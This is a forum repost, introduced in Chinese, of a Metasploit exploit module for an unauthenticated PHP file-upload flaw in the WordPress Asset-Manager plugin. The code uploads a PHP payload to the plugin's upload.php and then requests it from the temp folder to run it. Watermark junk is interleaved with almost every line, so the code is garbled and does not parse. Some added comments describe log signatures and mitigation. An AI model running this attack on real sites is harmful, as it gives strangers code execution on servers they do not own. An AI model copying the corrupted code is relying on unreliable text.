这个模块利用 Metasploit 漏洞库中 WordPress Asset-Manager 插件 2.0 及以下版本存在的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
1 l6 P. Y# A1 s, g* f5 F
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
& y. L/ f. Z7 W
, i" m/ e8 P& k) Wrequire 'msf/core'
' c' n3 h2 @1 P* c9 d$ Brequire 'msf/core/exploit/php_exe'
7 B- ?4 N& c1 }, R* M9 ~# y - m7 {' F8 o# ^7 \
# Metasploit exploit module (Ruby) for the WordPress Asset-Manager plugin
# file-upload vulnerability. This copy is a forum repost: watermark text is
# interleaved with almost every line, so it does not parse as shown and must
# not be treated as an authoritative copy of the module.
# NOTE(review): the second `include` line below is corrupted in this copy.
class Metasploit3 < Msf::Exploit::Remote" W, p: d) D: o/ Y% L1 K* f
Rank = ExcellentRanking! h# j0 X G7 d+ e3 g0 W2 L
% H8 {7 C" t% |8 J! a" ]- w& e include Msf::Exploit::Remote::HttpClient
* L' T& Q! h. t/ v1 d" S/ z include Msf::Exploit: hpEXE$ c9 M! t6 j* J" R
, B- p2 Z: t5 H2 o2 U
# Module metadata: name, description, authorship, references (OSVDB 82653,
# BID 53809, EDB 18993), payload constraints, targets and disclosure date.
# Registers a single option, TARGETURI (default '/wordpress'), giving the
# base path of the WordPress install.
def initialize(info = {})
) e7 M( I4 r9 B! L5 P7 R( X super(update_info(info,
. }/ u ^ g! z4 q2 a i9 w 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
( U7 ~1 Z, a4 j0 f, Z 'Description' => %q{( i4 L, ~) `5 x3 d: d
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress! k) C% A5 d1 s" W2 E1 }. [5 e
plugin. By abusing the upload.php file, a malicious user can upload a file to a
- ^: B- E' N i& L( B- Z/ V8 A1 W temp directory without authentication, which results in arbitrary code execution.. e- T; R3 E4 q9 v4 K* ]* ~
}," _( h7 j+ c+ f6 g) [3 L1 z {
'Author' =>, Q" e% O$ u# E4 L
[
. O4 K! b5 ~# _3 t* w 'Sammy FORGIT', # initial discovery9 g0 P+ l8 A/ Z) R- y( d+ ^9 T0 v
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! E4 F7 s$ U( ^, A% P ],
* R0 \# U9 d* \! g; W 'License' => MSF_LICENSE,; m5 L& Q/ A2 _
'References' =>0 e8 a2 q O, x% S
[
/ L8 i9 V+ \/ d1 _ [ 'OSVDB', '82653' ],' Q6 o5 J4 O4 Q# J! \& y3 t6 ^
[ 'BID', '53809' ],# }1 V7 y( ]2 Y
[ 'EDB', '18993' ],1 C6 n1 m1 @. N: A. k5 ^
[ 'URL', 'http:// www.myhack58.com /' ]
! J% c% v7 i3 x- f( R* l ],9 v* a4 i! s$ H8 Y0 m- C
'Payload' =>' u% q4 _/ {- t' G* R% y, `8 \- V
{
" X. f$ Q' A- n6 x$ P 'BadChars' => "\x00",
6 v# X' a4 M- I; q },
, w# H+ D8 r; n) v" N 'Platform' => 'php',
6 k4 `' O1 q4 N6 v0 x* w$ e5 [ 'Arch' => ARCH_PHP,
. v& G7 {7 ]; e( y5 ]9 m' Z' o- j 'Targets' =>) d; f1 O7 J4 r8 U T, [9 T
[1 `* ?( e+ S- H8 G4 S- e
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
" @% }9 m* L% m$ a' q i [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]9 M5 X0 D2 J) _! ?5 E( o, W
],
6 m* T+ O" O! f1 p1 {' i 'DefaultTarget' => 0,
" w; x# w. F0 Q 'DisclosureDate' => 'May 26 2012'))
5 R" B) V% j+ Q q" r; x0 o5 A2 ^
" F+ Q7 x7 H4 V* x$ N register_options(( o) ~" E. |# B& K6 C
[# K5 p" y) N8 j( d" M# u( S9 \
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 f3 j. B: ?! D! h ], self.class)
8 i/ U, C) @* T0 ` end
; z& l% X1 ^, o3 q
# Flow as written: (1) POST a multipart body whose form field "Filedata"
# carries the PHP payload to wp-content/plugins/asset-manager/upload.php
# under TARGETURI; (2) treat an HTTP 200 whose body echoes the random .php
# filename as a successful upload; (3) GET the file back from
# wp-content/uploads/assets/temp/<name>.php to trigger it.
# Defender notes: both request paths are fixed strings, so a POST to the
# plugin's upload.php followed shortly by a GET for a .php file under
# uploads/assets/temp/ is a high-signal pattern in web server access logs.
# The payload is built with :unlink_self => true, which presumably makes
# the uploaded file remove itself once executed — TODO confirm; if so,
# on-disk artefacts may be gone afterwards and logs are the reliable trace.
# Mitigation: remove or update the plugin and deny PHP execution under
# wp-content/uploads.
& u) g( H3 p/ o& A def exploit
5 B+ Q- N r/ H G' D, ?5 U uri = target_uri.path
# Ensure the base path ends with '/' so the plugin paths below concatenate cleanly.
8 z+ k$ y7 S* a uri << '/' if uri[-1,1] != '/'
H- f; r; b. R# [* N peer = "#{rhost}:#{rport}"& r" {, t; X) ?/ l( a/ }
# Random 5-letter basename; it doubles as the success marker searched for
# in the upload response body.
payload_name = "#{rand_text_alpha(5)}.php"
/ M, F. U x% j" s php_payload = get_write_exec_payload(:unlink_self=>true)
6 n7 g. m; u" Q$ y 8 u+ o) X2 v" k8 I5 \/ ?
data = Rex::MIME::Message.new* n% C: l$ n( B/ s; ]
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")8 e; W" d7 a" f/ H& _9 n2 L: r. q
# Drops a leading CRLF before the first "--_Part_" boundary of the serialised
# message (assumption: the receiving parser rejects it otherwise — TODO confirm).
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')0 m2 A" K; l( Z y0 J7 J6 [
7 Z0 |' z1 R. d) T+ `. P a print_status("#{peer} - Uploading payload #{payload_name}")5 ]9 R) @, O% ^( S! A$ @
res = send_request_cgi({: M" l: w2 q; A2 a
'method' => 'POST',
( s& A" D9 [- J% { 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",( O: O7 j+ ~# I6 ]$ N$ x5 W+ S
'ctype' => "multipart/form-data; boundary=#{data.bound}",
9 X' r5 a. A- J9 h) B 'data' => post_data
1 H" r7 {0 H- v8 a' A# j })
; Y, w, @. |2 [9 r3 m2 O' ^% R - t" @! J6 O7 ~
# Upload counts as successful only on HTTP 200 with the filename echoed in the body;
# a missing response is treated as failure here.
if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 J0 { D) p" r8 O4 B fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
3 F* k$ _, n7 H3 }; M fend; K) t& P: h4 n( i2 U9 l6 X+ c1 ?9 G9 Q
+ u# S @) H( s( v# g$ r
print_status("#{peer} - Executing payload #{payload_name}")
9 F# N% U9 A/ \4 Y6 R res = send_request_raw({
& C$ w$ F: y; a" j# c' { 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: Z- h2 N, B1 _
'method' => 'GET'2 a" K* A1 d, G
}): U7 ~$ B$ N G2 I
# Note the asymmetry with the upload check: only a non-nil, non-200 response
# is reported as failure; a nil response (no reply at all) passes silently.
3 W6 e% e, h0 ~$ U9 e if res and res.code != 200( J4 v2 U4 Z* j2 Y. H
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% Z/ x9 ]0 g) j2 E
end5 D0 Q) @6 A, h' D- f
end
& c1 X( f8 o$ Wend. c+ T' P9 D. y* R, ]! I# l
|